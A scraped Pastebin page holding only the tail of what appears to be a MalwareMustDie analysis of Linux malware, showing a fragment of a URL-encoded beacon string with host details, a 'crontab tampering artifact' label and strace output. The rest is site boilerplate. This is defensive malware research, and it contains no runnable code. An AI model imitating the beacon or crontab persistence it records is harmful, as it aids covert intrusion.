0xc420055238  xxxxxxx+%231+SMP+xxxxxxxxxxxxxx+x86_64+GNU%2FLinux%0A&amp;version=1&amp;whoami=nyan_apt%0A..... 

// crontab tampering artifact

munmap(0x7f75952fb000, 4096)      = 0
socket(PF_FILE, SOCK_DGRAM|SOCK_CLOEXEC, 0) = 3
connect(3, {sa_family=AF_FILE, path=&quot;/dev/log&quot;}, 110) = 0
sendto(3, &quot;&lt;78&gt;Jan 10 07:55:51 crontab[2547]: (test) LIST (test)&quot;, 53, MSG_NOSIGNAL, NULL, 0) = 53


---
# MalwareMustDie! - Don&#039;t spread malware - spread LOVE! @unixfreaxjp</textarea>
    
        
</div>            <div style="clear: both;"></div>

                        
<!-- 0-x2xy94pJ -->
<div style="padding-bottom:20px; padding-top:20px;">
<div class="adsbyvli" data-ad-slot="vi_1282577474" style="width: 970px; height: 90px"></div><script>(vitag.Init = window.vitag.Init || []).push(function(){viAPItag.display("vi_1282577474")})</script>
</div>
        </div>

        <div class="sidebar h_1024">
            



                
    <div class="sidebar__title">
        <a href="/archive">Public Pastes</a>
    </div>
    <ul class="sidebar__menu">

                    <li>
                <a href="/Fq2x020K">ingresar</a>
                <div class="details">
                                            Python |
                    
                    28 sec ago
                    | 0.29 KB                </div>
            </li>
                    <li>
                <a href="/fp2ZnSJU">funciones</a>
                <div class="details">
                                            Python |
                    
                    1 min ago
                    | 0.23 KB                </div>
            </li>
                    <li>
                <a href="/Ltemy1DW">2021-12-23_stats.json</a>
                <div class="details">
                                            JSON |
                    
                    19 min ago
                    | 5.81 KB                </div>
            </li>
                    <li>
                <a href="/QnD1FMin">calculadora</a>
                <div class="details">
                                            Python |
                    
                    22 min ago
                    | 5.14 KB                </div>
            </li>
                    <li>
                <a href="/zAzVyg8P">Course Schedule - Leetcode</a>
                <div class="details">
                                            Java |
                    
                    32 min ago
                    | 1.50 KB                </div>
            </li>
                    <li>
                <a href="/vRJfEAty">Paste Ping</a>
                <div class="details">
                                            C |
                    
                    33 min ago
                    | 0.02 KB                </div>
            </li>
                    <li>
                <a href="/trAmneiA">Untitled</a>
                <div class="details">
                                            Java |
                    
                    55 min ago
                    | 4.56 KB                </div>
            </li>
                    <li>
                <a href="/rhmrKN5j">4520</a>
                <div class="details">
                                            JavaScript |
                    
                    1 hour ago
                    | 0.00 KB                </div>
            </li>
        
    </ul>
            

    <div class="sidebar__sticky -on">
                
<!-- 0-x2xy94pJ -->
<div style="padding-bottom:10px; padding-top:20px;">
<div class="adsbyvli" data-ad-slot="vi_1282578983" style="width: 300px; height: 600px"></div><script>(vitag.Init = window.vitag.Init || []).push(function(){viAPItag.display("vi_1282578983")})</script>
</div>
    </div>
        </div>
    </div>
</div>


    
<div class="top-footer">
    <a class="icon-link -size-24-24 -chrome" href="/tools#chrome" title="Google Chrome Extension"></a>
    <a class="icon-link -size-24-24 -firefox" href="/tools#firefox" title="Firefox Extension"></a>
    <a class="icon-link -size-24-24 -iphone" href="/tools#iphone" title="iPhone/iPad Application"></a>
    <a class="icon-link -size-24-24 -windows" href="/tools#windows" title="Windows Desktop Application"></a>
    <a class="icon-link -size-24-24 -android" href="/tools#android" title="Android Application"></a>
    <a class="icon-link -size-24-24 -macos" href="/tools#macos" title="MacOS X Widget"></a>
    <a class="icon-link -size-24-24 -opera" href="/tools#opera" title="Opera Extension"></a>
    <a class="icon-link -size-24-24 -unix" href="/tools#pastebincl" title="Linux Application"></a>
</div>

<footer class="footer">
    <div class="container">
        <div class="footer__container">

            <div class="footer__left">
                <a href="/">create new paste</a> <span class="footer__devider">&nbsp;/&nbsp;</span>
                                <a href="/languages">syntax languages</a> <span class="footer__devider">&nbsp;/&nbsp;</span>
                <a href="/archive">archive</a> <span class="footer__devider">&nbsp;/&nbsp;</span>
                <a href="/faq">faq</a> <span class="footer__devider">&nbsp;/&nbsp;</span>
                <a href="/tools">tools</a> <span class="footer__devider">&nbsp;/&nbsp;</span>
                <a href="/night_mode">night mode</a> <span class="footer__devider">&nbsp;/&nbsp;</span>
                <a href="/doc_api">api</a> <span class="footer__devider">&nbsp;/&nbsp;</span>
                <a href="/doc_scraping_api">scraping api</a> <span class="footer__devider">&nbsp;/&nbsp;</span>
                <a href="/news">news</a> <span class="footer__devider">&nbsp;/&nbsp;</span>
                <a href="/pro" class="pro">pro</a>

                <br>
                <a href="/doc_privacy_statement">privacy statement</a> <span class="footer__devider">&nbsp;/&nbsp;</span>
                <a href="/doc_cookies_policy">cookies policy</a> <span class="footer__devider">&nbsp;/&nbsp;</span>
                <a href="/doc_terms_of_service">terms of service</a><sup style="color:#999">updated</sup> <span class="footer__devider">&nbsp;/&nbsp;</span>
                <a href="/doc_security_disclosure">security disclosure</a> <span class="footer__devider">&nbsp;/&nbsp;</span>
                <a href="/dmca">dmca</a> <span class="footer__devider">&nbsp;/&nbsp;</span>
                <a href="/report-abuse">report abuse</a> <span class="footer__devider">&nbsp;/&nbsp;</span>
                <a href="/contact">contact</a>

                <br>

                                
                <br>

                
<span class="footer__bottom h_800">
    By using Pastebin.com you agree to our <a href="/doc_cookies_policy">cookies policy</a> to enhance your experience.
    <br>
    Site design &amp; logo &copy; 2021 Pastebin</span>
            </div>

            <div class="footer__right h_1024">
                                    <a class="icon-link -size-40-40 -facebook-circle" href="https://facebook.com/pastebin" rel="nofollow" title="Like us on Facebook" target="_blank"></a>
                    <a class="icon-link -size-40-40 -twitter-circle" href="https://twitter.com/pastebin" rel="nofollow" title="Follow us on Twitter" target="_blank"></a>
                            </div>

        </div>
    </div>
</footer>
    


    
<div class="popup-container">

                <div class="popup-box -cookies" data-name="l2c_1">
            We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the <a href="/doc_cookies_policy">Cookies Policy</a>.            &nbsp;<span class="cookie-button js-close-cookies">OK, I Understand</span>
        </div>
    
                <div class="popup-box -pro" data-name="l2c_2_pg">
            <div class="pro-promo-img">
                <a href="/signup">
                    <img src="/themes/pastebin/img/hello.png" alt=""/>
                </a>
            </div>
            <div class="pro-promo-text">
                Not a member of Pastebin yet?<br/>
                <a href="/signup"><b>Sign Up</b></a>, it unlocks many cool features!            </div>
            <div class="close js-close-pro-guest" title="Close Me">&nbsp;</div>
        </div>
    
    
    
</div>
    

<span class="cd-top"></span>

<script src="/assets/9ce1885/jquery.min.js"></script>
<script src="/assets/f04f76b8/yii.js"></script>
<script>
    const POST_EXPIRATION_NEVER = 'N';
    const POST_EXPIRATION_BURN = 'B';
    const POST_STATUS_PUBLIC = '0';
    const POST_STATUS_UNLISTED = '1';
</script>
<script src="/themes/pastebin/js/vendors.bundle.js?ec0a0b6023b5e6c9982d"></script>
<script src="/themes/pastebin/js/app.bundle.js?ec0a0b6023b5e6c9982d"></script>

</body>
</html>
